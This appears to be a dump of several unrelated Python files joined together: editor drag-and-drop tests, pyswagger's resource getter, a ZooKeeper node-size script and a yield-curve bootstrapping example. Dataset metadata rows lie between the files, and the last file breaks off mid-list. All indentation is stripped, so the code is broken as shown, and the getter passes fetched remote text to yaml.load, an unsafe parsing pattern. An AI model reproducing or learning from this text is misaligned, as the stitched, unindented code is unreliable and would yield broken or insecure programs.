yield test, c(items="", accepted_type="unknown type")
for atype in (const.DOC_ID_LIST_PBOARD_TYPE, ak.NSFilenamesPboardType):
for items in ("d", "p", "pdp", "ppp"):
result = not items.replace("p", "")
yield test, c(items=items, accepted_type=atype, result=result)
def test_get_id_path_pairs():
@gentest
def test(config, indices, path_info):
def getitem(index):
item = window.projects[index[0]]
if len(index) > 1:
item = item.editors[index[1]]
if item.document.has_real_path():
assert item.file_path.startswith(tmp), item.file_path
with open(item.file_path, "w") as fh:
pass
assert len(index) < 3, index
return item
with test_app(config) as app:
tmp = test_app(app).tmp + os.path.sep
window = app.windows[0]
items = [getitem(i) for i in indices]
result = app.windows[0].get_id_path_pairs(items)
eq_(len(result), len(items))
eq_(len(result), len(path_info))
for item, has_path, pair in zip(items, path_info, result):
eq_(pair[0], item.id, item)
eq_(pair[1], item.file_path if has_path else None)
yield test("project", [[0]], [False])
yield test("project editor", [[0, 0]], [False])
yield test("project editor(/file.txt)", [[0, 0]], [True])
def test_validate_drop():
@test_app
def test(app, config):
m = Mocker()
ed = Window(app)
ed.wc = m.mock(WindowController)
ov = m.mock(ak.NSOutlineView)
# TODO investigate where NSDraggingInfo went during the upgrade to 10.5
info = m.mock() #NSDraggingInfo)
item = m.mock()
index = 0
ed.is_project_drag = m.method(ed.is_project_drag)
ed.is_project_drag(info) >> config.is_proj
if config.is_proj:
if not config.item_is_none:
obj = "<item.observedObject>"
representedObject(item) >> obj
if config.path_is_none:
path = None
else:
path = m.mock(fn.NSIndexPath)
path.indexAtPosition_(0) >> config.path_index
ov.setDropItem_dropChildIndex_(None, config.path_index)
ed.wc.docsController.indexPathForObject_(obj) >> path
else:
item = None
index = config.index
if index < 0:
ed.projects = ["<proj>"] * config.num_projs
ov.setDropItem_dropChildIndex_(None, config.num_projs)
else:
drop = True
if not config.item_is_none:
if config.item_is_proj:
index = config.index
obj = m.mock(type=Project)
if index < 0:
obj.editors >> (["<doc>"] * config.proj_docs)
ov.setDropItem_dropChildIndex_(item, config.proj_docs)
else:
obj = m.mock(type=Editor)
drop = False
representedObject(item) >> obj
else:
item = None
index = config.index
if config.index < 0:
ed.projects = ["<proj>"] * (config.last_proj_index + 1)
if config.last_proj_index > -1:
path = fn.NSIndexPath.indexPathWithIndex_(config.last_proj_index)
proj = m.mock(Project)
node = m.mock()
ed.wc.docsController.nodeAtArrangedIndexPath_(path) >> node
representedObject(node) >> proj
proj.editors >> (["<doc>"] * config.proj_docs)
ov.setDropItem_dropChildIndex_(node, config.proj_docs)
else:
ov.setDropItem_dropChildIndex_(None, -1)
elif index == 0:
drop = False
if drop:
info.draggingSourceOperationMask() >> ak.NSDragOperationGeneric
with m:
result = ed.validate_drop(ov, info, item, index)
eq_(result, config.result)
cfg = TestConfig(is_proj=True, item_is_none=False, result=ak.NSDragOperationMove)
for i in (-1, 0, 1, 2):
yield test, cfg(item_is_none=True, index=i, num_projs=2)
yield test, cfg(path_is_none=True, result=ak.NSDragOperationNone)
for p in (0, 1, 2):
yield test, cfg(path_is_none=False, path_index=p)
cfg = cfg(is_proj=False, result=ak.NSDragOperationGeneric)
for i in (-1, 0, 2):
yield test, cfg(item_is_proj=True, index=i, proj_docs=2)
yield test, cfg(item_is_proj=False, result=ak.NSDragOperationNone)
cfg = cfg(item_is_none=True)
yield test, cfg(index=-1, last_proj_index=-1)
yield test, cfg(index=-1, last_proj_index=0, proj_docs=0)
yield test, cfg(index=-1, last_proj_index=0, proj_docs=2)
yield test, cfg(index=-1, last_proj_index=2, proj_docs=2)
yield test, cfg(index=0, result=ak.NSDragOperationNone)
yield test, cfg(index=1)
yield test, cfg(index=2)
def test_accept_drop():
@test_app
def test(app, c):
m = Mocker()
ed = Window(app)
ed.wc = m.mock(WindowController)
ed.insert_items = m.method(ed.insert_items)
ed.iter_dropped_id_list = m.method(ed.iter_dropped_id_list)
ed.iter_dropped_paths = m.method(ed.iter_dropped_paths)
ov = m.mock(ak.NSOutlineView)
# TODO investigate where NSDraggingInfo went during the upgrade to 10.5
parent = None if c.item_is_none else m.mock()
index = 0
items = m.mock()
pb = m.mock(ak.NSPasteboard)
pb.availableTypeFromArray_(ed.supported_drag_types) >> c.accepted_type
if c.accepted_type == const.DOC_ID_LIST_PBOARD_TYPE:
id_list = pb.propertyListForType_(const.DOC_ID_LIST_PBOARD_TYPE) >> m.mock()
ed.iter_dropped_id_list(id_list) >> items
act = c.act
elif c.accepted_type == ak.NSFilenamesPboardType:
act = None
paths = pb.propertyListForType_(ak.NSFilenamesPboardType) >> m.mock()
items = ed.iter_dropped_paths(paths) >> items
else:
items = None
assert c.accepted_type is None
if items is not None:
ed.insert_items(items, parent, index, act) >> c.result
with m:
result = ed.accept_drop(ov, pb, parent, index, c.act)
eq_(result, c.result)
c = TestConfig(result=True, item_is_none=False, act=None)
yield test, c(accepted_type=const.DOC_ID_LIST_PBOARD_TYPE)
yield test, c(accepted_type=const.DOC_ID_LIST_PBOARD_TYPE, act=const.COPY)
yield test, c(accepted_type=const.DOC_ID_LIST_PBOARD_TYPE, act=const.MOVE)
yield test, c(accepted_type=ak.NSFilenamesPboardType)
yield test, c(accepted_type=ak.NSFilenamesPboardType, item_is_none=True)
yield test, c(accepted_type=None, result=False)
def test_iter_dropped_id_list():
@test_app
def test(app, c):
m = Mocker()
ed = Window(app, None)
app = m.replace(ed, 'app')
result_items = []
if c.has_ids:
ids = []
for it in c.ids:
ids.append(it.id)
item = m.mock()
app.find_item_with_id(it.id) >> (item if it.found else None)
if it.found:
result_items.append(item)
else:
ids = None
with m:
result = list(ed.iter_dropped_id_list(ids))
eq_(result, result_items)
c = TestConfig(has_ids=True)
ix = lambda id, found=True: TestConfig(id=id, found=found)
yield test, c(has_ids=False)
yield test, c(ids=[])
yield test, c(ids=[ix(0)])
yield test, c(ids=[ix(0), ix(1)])
yield test, c(ids=[ix(0, False)])
yield test, c(ids=[ix(0), ix(1, False)])
def test_iter_dropped_paths():
def doc(num, tmp):
path = os.path.join(tmp, "doc%s.txt" % num)
with open(path, mode="w") as fh:
fh.write('doc')
return path
def sym(num, tmp):
path = os.path.join(tmp, "doc%s.sym" % num)
os.symlink(path + ".txt", path)
return path
def proj(num, tmp):
path = os.path.join(tmp, "proj_%s" % num)
os.mkdir(path)
return path
@test_app
def test(app, c):
m = Mocker()
ed = Window(app)
app = m.replace(ed, 'app')
dc = m.mock(DocumentController)
result_items = []
with tempdir() as tmp:
if c.has_paths:
paths = []
for it in c.paths:
path = it.create(tmp)
paths.append(path)
if it.ignored:
continue
doc = app.document_with_path(path) \
>> m.mock(path, spec=TextDocument)
result_items.append(doc)
else:
paths = None
with m:
result = list(ed.iter_dropped_paths(paths))
eq_(result, result_items)
c = TestConfig(has_paths=True)
def path(create, ignored=False, num=[0]):
num[0] += 1
if create is None:
return TestConfig(create=(lambda tmp: None), ignored=ignored)
return TestConfig(create=partial(create, num[0]), ignored=ignored)
yield test, c(has_paths=False)
yield test, c(paths=[])
yield test, c(paths=[path(None)])
yield test, c(paths=[path(doc)])
yield test, c(paths=[path(sym)])
yield test, c(paths=[path(doc), path(sym), path(doc)])
yield test, c(paths=[path(proj, ignored=True)])
# yield test, c(paths=[path(proj)])
# yield test, c(paths=[path(proj), path(doc), path(proj)])
#yield test, c(paths=[path(proj, is_open=False)])
def test_insert_items():
def test(c):
def get_parent_index(drop, offset=0):
if any(v in '0123456789' for v in drop[0]):
assert all(v in '0123456789' for v in drop[0]), drop
return None, pindex
return project, dindex + offset
def namechar(item, seen=set()):
name = test_app(app).name(item)
name = name[len(type(item).__name__):]
assert name.startswith(("(", "[", "<")), name
assert name.endswith((")", "]", ">")), name
name = name[1:-1]
assert name not in seen, (item, name)
seen.add(name)
return name
config = []
pindex = dindex = -1
project = None
for i, char in enumerate(c.init + ' '):
if char == "|":
config.append("window")
pindex = dindex = -1
continue
if char == ' ':
if i == c.drop[1]:
offset = 1 if project is not None else 0
parent, index = get_parent_index(c.drop, offset)
dindex = -1
continue
if char == "*":
config[-1] += "*"
if i == c.drop[1]:
raise ValueError("invalid drop index: {!r}".format(c.drop))
continue
name = "({})".format(char)
if char in '0123456789':
item = project = "project" + name
pindex += 1
else:
item = "editor" + name
dindex += 1
config.append(item)
if i == c.drop[1]:
parent, index = get_parent_index(c.drop)
config = " ".join(config)
print(config)
with test_app(config) as app:
name_to_item = {}
for window in app.windows:
for project in window.projects:
char = namechar(project)
project.name = char
name_to_item[char] = project
for editor in project.editors:
char = namechar(editor)
editor.document.file_path = char
name_to_item[char] = editor
for char in c.drop[0]:
if char not in name_to_item and char not in '0123456789':
name_to_item[char] = TextDocument(app, char)
items = [name_to_item[char] for char in c.drop[0]] \
if "*" in c.final and c.init != c.final else []
window = app.windows[0]
if "project" in c:
eq_(c.drop[1], -1, "invalid test configuration; drop index "
"must be -1 when project is specified")
parent = c.project
index = c.drop[1]
if c.project == const.CURRENT:
args = ()
elif c.project is None:
args = (None,)
else:
args = (name_to_item[c.project],)
else:
if parent is None:
project = window.get_current_project()
if project is not None:
parent = "project(%s)" % project.name
if parent is not None:
parent = name_to_item[parent[8:-1]]
if index < 0:
index = len(parent.editors)
args = (parent, index, c.action)
print('drop(%s) %s at %s of %s' % (c.action, c.drop[0], index, parent))
result = window.insert_items(items, *args)
eq_(len(result), len(items))
final = ["window"]
for char in c.final:
if char == " ":
continue
if char == "|":
final.append("window")
continue
if char == "*":
final[-1] += "\\*"
continue
name = r"\({}\)".format(char)
if char in "0123456789":
if char not in c.init:
name = r"\[.\]"
final.append("project" + name)
continue
if char.isupper():
name = "\[{} .\]".format(char.lower())
final.append("editor" + name)
final = "^" + " ".join(final) + "$"
eq_(test_app(app).state, Regex(final, repr=final.replace("\\", "")))
def eq(a, b):
msg = lambda:"{} != {}".format(
test_app(app).name(a),
test_app(app).name(b),
)
eq_(a, b, msg)
for window in app.windows:
for project in window.projects:
eq(project.window, window)
for editor in project.editors:
eq(editor.project, project)
# number = project
# letter in range a-f = document
# letter in rnage A-F = new editor of document
# space before project allows drop on project (insert at end)
# pipe (|) delimits windows
# so ' 0ab*c 1 2de| 3*fa' is...
# window
# project 0
# document a
# document b (currently selected)
# document c
# project 1
# project 2
# document d
# document e
# window
# project 3 (currently selected)
# document f
# document a
#
# drop=(<dropped item(s)>, <drop index in init>)
config = TestConfig(init=' 0ab*c 1 2de')
c = config(action=const.MOVE)
yield test, c(drop=('', 0), final=' 0ab*c 1 2de')
yield test, c(drop=('', 1), final=' 0ab*c 1 2de')
yield test, c(drop=('', 2), final=' 0ab*c 1 2de')
yield test, c(drop=('', 3), final=' 0ab*c 1 2de')
yield test, c(drop=('', 5), final=' 0ab*c 1 2de')
yield test, c(drop=('', 6), final=' 0ab*c 1 2de')
yield test, c(drop=('', 7), final=' 0ab*c 1 2de')
yield test, c(drop=('', 8), final=' 0ab*c 1 2de')
yield test, c(drop=('', 9), final=' 0ab*c 1 2de')
yield test, c(drop=('', 10), final=' 0ab*c 1 2de')
yield test, c(drop=('', 11), final=' 0ab*c 1 2de')
yield test, c(drop=('', 12), final=' 0ab*c 1 2de')
yield test, c(drop=('a', 0), final=' 0bca* 1 2de')
yield test, c(drop=('a', 1), final=' 0bca* 1 2de')
yield test, c(drop=('a', 2), final=' 0ab*c 1 2de')
yield test, c(drop=('a', 3), final=' 0ab*c 1 2de')
yield test, c(drop=('a', 5), final=' 0ba*c 1 2de')
yield test, c(drop=('a', 6), final=' 0bca* 1 2de')
yield test, c(drop=('a', 7), final=' 0bc 1a* 2de')
yield test, c(drop=('a', 8), final=' 0bc 1a* 2de')
yield test, c(drop=('a', 9), final=' 0bc 1 2dea*')
yield test, c(drop=('a', 10), final=' 0bc 1 2a*de')
yield test, c(drop=('a', 11), final=' 0bc 1 2da*e')
yield test, c(drop=('a', 12), final=' 0bc 1 2dea*')
yield test, c(drop=('f', 0), final=' 0abcF* 1 2de')
yield test, c(drop=('f', 1), final=' 0abcF* 1 2de')
yield test, c(drop=('f', 2), final=' 0F*abc 1 2de')
yield test, c(drop=('f', 3), final=' 0aF*bc 1 2de')
yield test, c(drop=('f', 5), final=' 0abF*c 1 2de')
yield test, c(drop=('f', 6), final=' 0abcF* 1 2de')
yield test, c(drop=('f', 7), final=' 0abc 1F* 2de')
yield test, c(drop=('f', 8), final=' 0abc 1F* 2de')
yield test, c(drop=('f', 9), final=' 0abc 1 2deF*')
yield test, c(drop=('f', 10), final=' 0abc 1 2F*de')
yield test, c(drop=('f', 11), final=' 0abc 1 2dF*e')
yield test, c(drop=('f', 12), final=' 0abc 1 2deF*')
yield test, c(drop=('2', 0), final=' 0abc 1 2*de')
yield test, c(drop=('2', 1), final=' 2*de 0abc 1')
yield test, c(drop=('2', 2), final=' 2*de 0abc 1')
yield test, c(drop=('2', 3), final=' 2*de 0abc 1')
yield test, c(drop=('2', 5), final=' 2*de 0abc 1')
yield test, c(drop=('2', 6), final=' 2*de 0abc 1')
yield test, c(drop=('2', 7), final=' 0abc 2*de 1')
yield test, c(drop=('2', 8), final=' 0abc 2*de 1')
yield test, c(drop=('2', 9), final=' 0ab*c 1 2de')
yield test, c(drop=('2', 10), final=' 0ab*c 1 2de')
yield test, c(drop=('2', 11), final=' 0ab*c 1 2de')
yield test, c(drop=('2', 12), final=' 0ab*c 1 2de')
c = config(action=const.COPY)
yield test, c(drop=('', 0), final=' 0ab*c 1 2de')
yield test, c(drop=('', 1), final=' 0ab*c 1 2de')
yield test, c(drop=('', 2), final=' 0ab*c 1 2de')
yield test, c(drop=('', 3), final=' 0ab*c 1 2de')
yield test, c(drop=('', 5), final=' 0ab*c 1 2de')
yield test, c(drop=('', 6), final=' 0ab*c 1 2de')
yield test, c(drop=('', 7), final=' 0ab*c 1 2de')
yield test, c(drop=('', 8), final=' 0ab*c 1 2de')
yield test, c(drop=('', 9), final=' 0ab*c 1 2de')
yield test, c(drop=('', 10), final=' 0ab*c 1 2de')
yield test, c(drop=('', 11), final=' 0ab*c 1 2de')
yield test, c(drop=('', 12), final=' 0ab*c 1 2de')
yield test, c(drop=('a', 0), final=' 0abcA* 1 2de')
yield test, c(drop=('a', 1), final=' 0abcA* 1 2de')
yield test, c(drop=('a', 2), final=' 0A*abc 1 2de')
yield test, c(drop=('a', 3), final=' 0aA*bc 1 2de')
yield test, c(drop=('a', 5), final=' 0abA*c 1 2de')
yield test, c(drop=('a', 6), final=' 0abcA* 1 2de')
yield test, c(drop=('a', 7), final=' 0abc 1A* 2de')
yield test, c(drop=('a', 8), final=' 0abc 1A* 2de')
yield test, c(drop=('a', 9), final=' 0abc 1 2deA*')
yield test, c(drop=('a', 10), final=' 0abc 1 2A*de')
yield test, c(drop=('a', 11), final=' 0abc 1 2dA*e')
yield test, c(drop=('a', 12), final=' 0abc 1 2deA*')
c = config(action=None)
yield test, c(drop=('', 0), final=' 0ab*c 1 2de')
yield test, c(drop=('', 1), final=' 0ab*c 1 2de')
yield test, c(drop=('', 2), final=' 0ab*c 1 2de')
yield test, c(drop=('', 3), final=' 0ab*c 1 2de')
yield test, c(drop=('', 5), final=' 0ab*c 1 2de')
yield test, c(drop=('', 6), final=' 0ab*c 1 2de')
yield test, c(drop=('', 7), final=' 0ab*c 1 2de')
yield test, c(drop=('', 8), final=' 0ab*c 1 2de')
yield test, c(drop=('', 9), final=' 0ab*c 1 2de')
yield test, c(drop=('', 10), final=' 0ab*c 1 2de')
yield test, c(drop=('', 11), final=' 0ab*c 1 2de')
yield test, c(drop=('', 12), final=' 0ab*c 1 2de')
yield test, c(drop=('a', 0), final=' 0a*bc 1 2de')
yield test, c(drop=('a', 1), final=' 0a*bc 1 2de')
yield test, c(drop=('a', 2), final=' 0a*bc 1 2de')
yield test, c(drop=('a', 3), final=' 0a*bc 1 2de')
yield test, c(drop=('a', 5), final=' 0a*bc 1 2de')
yield test, c(drop=('a', 6), final=' 0a*bc 1 2de')
yield test, c(drop=('a', 7), final=' 0abc 1A* 2de')
yield test, c(drop=('a', 8), final=' 0abc 1A* 2de')
yield test, c(drop=('a', 9), final=' 0abc 1 2deA*')
yield test, c(drop=('a', 10), final=' 0abc 1 2A*de')
yield test, c(drop=('a', 11), final=' 0abc 1 2dA*e')
yield test, c(drop=('a', 12), final=' 0abc 1 2deA*')
yield test, c(drop=('f', 0), final=' 0abcF* 1 2de')
yield test, c(drop=('f', 1), final=' 0abcF* 1 2de')
yield test, c(drop=('f', 2), final=' 0F*abc 1 2de')
yield test, c(drop=('f', 3), final=' 0aF*bc 1 2de')
yield test, c(drop=('f', 5), final=' 0abF*c 1 2de')
yield test, c(drop=('f', 6), final=' 0abcF* 1 2de')
yield test, c(drop=('f', 7), final=' 0abc 1F* 2de')
yield test, c(drop=('f', 8), final=' 0abc 1F* 2de')
yield test, c(drop=('f', 9), final=' 0abc 1 2deF*')
yield test, c(drop=('f', 10), final=' 0abc 1 2F*de')
yield test, c(drop=('f', 11), final=' 0abc 1 2dF*e')
yield test, c(drop=('f', 12), final=' 0abc 1 2deF*')
# cannot copy project yet
# yield test, c(drop=('2', 0), final=' 0abc 1 2de')
# yield test, c(drop=('2', 1), final=' 2de 0abc 1')
# yield test, c(drop=('2', 2), final=' 2de 0abc 1')
# yield test, c(drop=('2', 3), final=' 2de 0abc 1')
# yield test, c(drop=('2', 4), final=' 2de 0abc 1')
# yield test, c(drop=('2', 5), final=' 2de 0abc 1')
# yield test, c(drop=('2', 6), final=' 0abc 2de 1')
# yield test, c(drop=('2', 7), final=' 0abc 2de 1')
# yield test, c(drop=('2', 8), final=' 0abc 1 2de')
# yield test, c(drop=('2', 9), final=' 0abc 1 2de')
# yield test, c(drop=('2', 10), final=' 0abc 1 2de')
# yield test, c(drop=('2', 11), final=' 0abc 1 2de')
c = config(action=None, init=' 0ab*c 1 2de')
yield test, c(drop=('a', -1), final=' 0a*bc 1 2de', project=const.CURRENT)
yield test, c(drop=('a', -1), final=' 0a*bc 1 2de', project=None)
yield test, c(drop=('a', -1), final=' 0abc 1 2deA*', project='2')
c = config(action=None, init=' 0abc 1* 2de')
yield test, c(drop=('a', -1), final=' 0abc 1A* 2de', project=const.CURRENT)
yield test, c(drop=('a', -1), final=' 0abc 1A* 2de', project=None)
yield test, c(drop=('a', -1), final=' 0abc 1 2deA*', project='2')
c = config(action=None, init=' 0abc 1 2de*')
yield test, c(drop=('a', -1), final=' 0abc 1 2deA*', project=const.CURRENT)
yield test, c(drop=('a', -1), final=' 0abc 1 2deA*', project=None)
yield test, c(drop=('a', -1), final=' 0abc 1 2deA*', project='2')
c = config(init=' 0a | 1bc', action=const.MOVE)
yield test, c(drop=('b', 1), final=' 0ab* | 1c*')
yield test, c(drop=('b', 2), final=' 0b*a | 1c*')
yield test, c(drop=('1', 0), final=' 0a 1*bc |')
yield test, c(drop=('1', 1), final=' 1*bc 0a |')
# TODO implement move
# c = config(init=' 0a* | 1b*c', action=const.MOVE)
# yield test, c(drop=('b', 1), final=' 0ab* | 1c*')
# yield test, c(drop=('b', 2), final=' 0b*a | 1c*')
#
# yield test, c(drop=('1', 0), final=' 0a 1b*c |')
# yield test, c(drop=('1', 1), final=' 1b*c 0a |')
#yield test, c(drop=('a', 6), final=' 0 | 1bca*') # should fail (item inserted in wrong window)
def test_undo_manager():
@gentest
def test(config, has_doc=True, check_editor=True):
with test_app(config) as app:
window = app.windows[0]
result = window.undo_manager
if has_doc:
eq_(result, window.current_editor.undo_manager)
else:
eq_(result, window.no_document_undo_manager)
if check_editor:
eq_(window.current_editor, None)
yield test("window", has_doc=False)
yield test("window project", has_doc=False)
yield test("window project* editor")
yield test("window project editor* editor")
yield test("window project editor editor*")
| gpl-3.0 | 5,623,553,323,998,416,000 | 38.21772 | 104 | 0.535104 | false | 3.486658 | true | false | false |
mission-liao/pyswagger | pyswagger/getter.py | 1 | 5406 | from __future__ import absolute_import
from .consts import private
from .utils import patch_path
import json
import yaml
import six
import os
import logging
import re
logger = logging.getLogger(__name__)
class Getter(six.Iterator):
""" base of getter object
Idealy, to subclass a getter, you just need to override load function.
The part to extend getter would be finalized once Swagger 2.0 is ready.
"""
def __init__(self, path):
self.base_path = path
def __iter__(self):
return self
def __next__(self):
if len(self.urls) == 0:
raise StopIteration
obj = self.load(self.urls.pop(0))
# make sure data is string type
if isinstance(obj, dict):
pass
elif isinstance(obj, six.binary_type):
obj = obj.decode('utf-8')
elif not isinstance(obj, six.string_types):
raise ValueError('Unknown types: [{0}]'.format(str(type(obj))))
# a very simple logic to distinguish json and yaml
if isinstance(obj, six.string_types):
try:
if obj.startswith('{'):
obj = json.loads(obj)
else:
obj = yaml.load(obj)
except ValueError:
raise Exception('Unknown format startswith {0} ...'.format(obj[:10]))
return obj
def load(self, path):
""" load the resource, and return for parsing.
:return: name and json object of resources
:rtype: (str, dict)
"""
raise NotImplementedError()
class LocalGetter(Getter):
""" default getter implmenetation for local resource file
"""
def __init__(self, path):
super(LocalGetter, self).__init__(path)
if path.startswith('file://'):
parsed = six.moves.urllib.parse.urlparse(path)
path = parsed.path
if re.match('^/[A-Z]+:', path) is not None:
path = os.path.abspath(path[1:])
for n in private.SWAGGER_FILE_NAMES:
if self.base_path.endswith(n):
self.base_path = os.path.dirname(self.base_path)
self.urls = [path]
break
else:
p = os.path.join(path, n)
if os.path.isfile(p):
self.urls = [p]
break
else:
# there is no file matched predefined file name:
# - resource_list.json (1.2)
# - swagger.json (2.0)
# in this case, we will locate them in this way:
# - when 'path' points to a specific file, and its
# extension is either 'json' or 'yaml'.
_, ext = os.path.splitext(path)
for e in [private.FILE_EXT_JSON, private.FILE_EXT_YAML, private.FILE_EXT_YML]:
if ext.endswith(e):
self.base_path = os.path.dirname(path)
self.urls = [path]
break
else:
for e in [private.FILE_EXT_JSON, private.FILE_EXT_YAML, private.FILE_EXT_YML]:
#print(path + '.' + e)
if os.path.isfile(path + '.' + e):
self.urls = [path + '.' + e]
break
else:
raise ValueError('Unable to locate resource file: [{0}]'.format(path))
def load(self, path):
logger.info('to load: [{0}]'.format(path))
path = patch_path(self.base_path, path)
logger.info('final path to load: [{0}]'.format(path))
ret = None
with open(path, 'r') as f:
ret = f.read()
return ret
class SimpleGetter(Getter):
""" the simple getter that don't have to concern file loading of LocalGetter
"""
__simple_getter_callback__ = lambda url: {}
""" the callback to load the resource, accept an URL and return a string buffer
"""
def __init__(self, path):
if isinstance(path, six.string_types):
super(SimpleGetter, self).__init__(path)
if self.base_path.endswith('/'):
self.base_path = self.base_path[:-1]
self.urls = [path]
else:
raise Exception('Unsupported type for "path": {} in SimpleGetter'.format(str(type(path))))
def load(self, path):
logger.info('to load: [{0}]'.format(path))
return self.__simple_getter_callback__.__func__(path)
def _url_load(path):
ret = f = None
try:
f = six.moves.urllib.request.urlopen(path)
ret = f.read()
finally:
if f:
f.close()
return ret
class UrlGetter(SimpleGetter):
""" default getter implementation for remote resource file
"""
__simple_getter_callback__ = _url_load
class DictGetter(Getter):
""" a getter accept a dict as parameter without loading from file / url
args:
- urls: the urls to be loaded in upcoming resolving (the order should be matched to get result correct)
- path2dict: a mapping from 'path' to 'dict', which is the mocking of 'downloaded data'
"""
def __init__(self, urls, path2dict):
super(DictGetter, self).__init__(urls[0])
self.urls = urls
self._path2dict = path2dict or {}
def load(self, path):
logger.info('to load: [{0}]'.format(path))
return self._path2dict.get(path, {})
| mit | -6,257,545,884,173,601,000 | 30.248555 | 108 | 0.54606 | false | 4.061608 | false | false | false |
bkeep/bkeep-manager | get_size.py | 1 | 1389 | #cat get_size.py
# -*- coding: utf-8 -*-
"""遍历指定路径下所有节点的大小"""
from kazoo.client import KazooClient,KazooState
import socket,sys, os, time, atexit
class dzk:
def __init__(self,hosts,secs):
self.hosts = hosts
#self.zk = KazooClient(hosts='1.1.1.3:2181,1.1.1.2:2181,1.1.1.1:2181',retry_max_delay=2000)
self.zk = KazooClient(hosts=self.hosts)
try:
self.zk.start()
self.zk.add_listener(self.listener)
except Exception,e:
print "ERROR connect LOST ==============>"
def listener(state):
if state == KazooState.LOST:
self.zk.start()
elif state == KazooState.SUSPENDED:
print "*******listener saw KazooState.LOST"
else:
print "*******listener saw KazooState.CONNECT"
def get_child(self,paths):
aa = self.zk.get_children(paths)
return aa
def getData(self,paths):
xx = self.zk.get(paths)
return xx[1][8]
def bianli(self,rootDir):
for i in self.get_child(rootDir):
if i:
i = rootDir + "/" + i
#if self.getData(i) > 1048570:
print i,"---->",self.getData(i)
self.bianli(i)
if __name__ == "__main__":
zzk = dzk("1.1.1.1:2181",2000)
#zzk.get_child()
#zzk.getData()
zzk.bianli("/")
| apache-2.0 | -8,220,321,272,629,685,000 | 27.957447 | 99 | 0.533431 | false | 3.004415 | false | false | false |
kevindkeogh/qbootstrapper | examples.py | 1 | 32131 | #! /usr/bin/env python
# vim: set fileencoding=utf-8
'''
Testing for USD, EUR, and GBP OIS qb. Note that these curves are the same
as the NY DVC curves (in terms of instruments). Using the 30 June 2016 data
below, we achieved <1bp difference for all points for the EUR and GBP OIS
curves to the Numerix curve. There was a difference of 1-2 bps for the USD OIS
curve, as that uses Average Index swaps, which have not been implemented.
The difference is attributable to that adjustment in instruments.
'''
import datetime
import copy
import qbootstrapper as qb
curve_effective = datetime.datetime(2016, 6, 30)
effective = datetime.datetime(2016, 7, 5)
# EUR OIS curve (6/30/2016 data, 6/30/2016 effective date)
eonia = qb.Curve(curve_effective)
eonia_conventions = {'fixed_length': 12,
'float_length': 12,
'fixed_basis': 'Act360',
'float_basis': 'Act360',
'fixed_period_adjustment': 'following',
'float_period_adjustment': 'following',
'fixed_payment_adjustment': 'following',
'float_payment_adjustment': 'following'
}
eonia_cash = qb.LIBORInstrument(curve_effective,
-0.00293,
5,
eonia,
length_type='days',
payment_adjustment='following')
eonia_short_instruments = [(datetime.datetime(2016, 8, 5), -0.00339),
(datetime.datetime(2016, 9, 5), -0.00347),
(datetime.datetime(2016, 10, 5), -0.00357),
(datetime.datetime(2016, 11, 5), -0.00367),
(datetime.datetime(2016, 12, 5), -0.00376),
(datetime.datetime(2017, 1, 5), -0.00385),
(datetime.datetime(2017, 2, 5), -0.00394),
(datetime.datetime(2017, 3, 5), -0.00400),
(datetime.datetime(2017, 4, 5), -0.00406),
(datetime.datetime(2017, 5, 5), -0.00412),
(datetime.datetime(2017, 6, 5), -0.00418)]
eonia_instruments = [(datetime.datetime(2017, 7, 5), -0.00423),
(datetime.datetime(2018, 1, 5), -0.00449),
(datetime.datetime(2018, 7, 5), -0.00468),
(datetime.datetime(2019, 7, 5), -0.00480),
(datetime.datetime(2020, 7, 5), -0.00441),
(datetime.datetime(2021, 7, 5), -0.00364),
(datetime.datetime(2022, 7, 5), -0.00295),
(datetime.datetime(2023, 7, 5), -0.00164),
(datetime.datetime(2024, 7, 5), -0.00055),
(datetime.datetime(2025, 7, 5), 0.00055),
(datetime.datetime(2026, 7, 5), 0.00155),
(datetime.datetime(2027, 7, 5), 0.00248),
(datetime.datetime(2028, 7, 5), 0.00325),
(datetime.datetime(2031, 7, 5), 0.00505),
(datetime.datetime(2036, 7, 5), 0.00651),
(datetime.datetime(2041, 7, 5), 0.00696),
(datetime.datetime(2046, 7, 5), 0.00707),
(datetime.datetime(2051, 7, 5), 0.00718),
(datetime.datetime(2056, 7, 5), 0.00724),
(datetime.datetime(2066, 7, 5), 0.00685)]
eonia.add_instrument(eonia_cash)
for idx, (maturity, rate) in enumerate(eonia_short_instruments):
inst = qb.OISSwapInstrument(effective,
maturity,
rate,
eonia,
fixed_basis='Act360',
fixed_length=idx + 1,
float_length=idx + 1)
eonia.add_instrument(inst)
for (maturity, rate) in eonia_instruments:
inst = qb.OISSwapInstrument(effective,
maturity,
rate,
eonia,
**eonia_conventions)
eonia.add_instrument(inst)
# USD OIS curve (6/30/2016 data, 6/30/2016 effective date)
# Note that these are synthetics, the actual swap rates for 6y+ maturities
# are average OIS + basis v LIBOR
fedfunds = qb.Curve(curve_effective)
fedfunds_short_conventions = {'fixed_period_adjustment': 'following',
'float_period_adjustment': 'following',
'fixed_payment_adjustment': 'following',
'float_payment_adjustment': 'following'}
fedfunds_conventions = {'fixed_length': 6,
'float_length': 3,
'fixed_basis': 'Act360',
'float_basis': 'Act360',
'fixed_period_adjustment': 'following',
'float_period_adjustment': 'following',
'fixed_payment_adjustment': 'following',
'float_payment_adjustment': 'following'}
fedfunds_cash = qb.LIBORInstrument(curve_effective,
0.003,
4,
fedfunds,
length_type='days',
payment_adjustment='following')
fedfunds_swap_onew = qb.OISSwapInstrument(effective,
datetime.datetime(2016, 7, 12),
0.00387,
fedfunds,
fixed_length=1,
float_length=1,
fixed_period_length='weeks',
float_period_length='weeks',
**fedfunds_short_conventions)
fedfunds_swap_twow = qb.OISSwapInstrument(effective,
datetime.datetime(2016, 7, 19),
0.00387,
fedfunds,
fixed_length=2,
float_length=2,
fixed_period_length='weeks',
float_period_length='weeks',
**fedfunds_short_conventions)
fedfunds_swap_threew = qb.OISSwapInstrument(effective,
datetime.datetime(2016, 7, 26),
0.00387,
fedfunds,
fixed_length=3,
float_length=3,
fixed_period_length='weeks',
float_period_length='weeks',
**fedfunds_short_conventions)
fedfunds_short_instruments = [(datetime.datetime(2016, 8, 5), 0.00378, 1),
(datetime.datetime(2016, 9, 5), 0.00375, 2),
(datetime.datetime(2016, 10, 5), 0.00371, 3),
(datetime.datetime(2016, 11, 5), 0.00369, 4),
(datetime.datetime(2016, 12, 5), 0.00366, 5),
(datetime.datetime(2017, 1, 5), 0.00365, 6),
(datetime.datetime(2017, 4, 5), 0.00371, 9)]
fedfunds_instruments = [(datetime.datetime(2017, 7, 5), 0.003780),
(datetime.datetime(2018, 1, 5), 0.003950),
(datetime.datetime(2018, 7, 5), 0.004220),
(datetime.datetime(2019, 7, 5), 0.004850),
